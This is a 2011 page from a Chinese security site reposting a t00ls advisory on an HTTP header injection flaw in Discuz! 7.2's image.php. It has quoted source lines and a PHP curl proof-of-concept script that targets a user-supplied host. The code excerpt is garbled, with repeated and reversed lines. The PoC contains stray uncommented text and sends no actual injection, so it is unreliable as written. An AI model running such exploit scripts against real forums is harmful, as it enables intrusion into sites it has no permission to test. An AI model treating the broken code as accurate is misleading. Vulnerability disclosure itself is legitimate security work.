首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
dz7.2 HTTP 头注入漏洞
来源:http://www.t00ls.net 作者:t00ls 发布时间:2011-07-11  

dz7.2 HTTP 头注入漏洞 20107/7/,dz7.2 header injection vulnerability 20107/7/

image.php:

header  header('location: '.$boardurl.$thumbfile);
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
$aid = intval($_GET['aid']);
$w = intval($w);
list($w, $h) = explode('x', $_GET['size']);
$h = intval($h);
list($w, $h) = explode('x', $_GET['size']);

requires:
if(!$nocache) {
if(file_exists($thumbfile)) {

 

 

POC:

#!/usr/bin/php -f 
<?php 

# image.php curl exploit 
# bincker/2010/7/7/ t00ls.net 
 
 
general settings: 
URL:   
COOKIEJAR:   
Max Exec Time:  (s)  
SSL:  BasicAuth:   
$_SERVER parameter:  
You can taint $_SERVER['PHP_SELF'] by editing the target URL.  
   
 
 
//  
// HTTP SERVER,   
//  
 
$target = $argv[1]; 
 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
curl_setopt($ch, CURLOPT_URL, "http://$target/image.php"); 
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); 
curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); 
$buf = curl_exec ($ch); 
curl_close($ch); 
unset($ch); 
 
echo $buf; 
 
?>

 

Form:t00ls



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·EC_word企业管理系统注入漏洞利
·shopxp网上购物系统v7.4爆密码0d
·dotnot编辑器漏洞
·KesionCMS 科汛网站管理系统V7.0
·卓讯智能化网站管理系统 EmteEas
·深喉cms文件包含漏洞致使数据库
·睿拓旅游信息门户系统 1.1 注入
·奶茶加盟店网站源码 1.0 注入漏
·玉叶随风企业建站系统多处漏洞
·养生馆建站系统多处漏洞
·Discuz!NT3.6 跨站漏洞 官网测
·网络商城购物系统v3.0全功能版
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved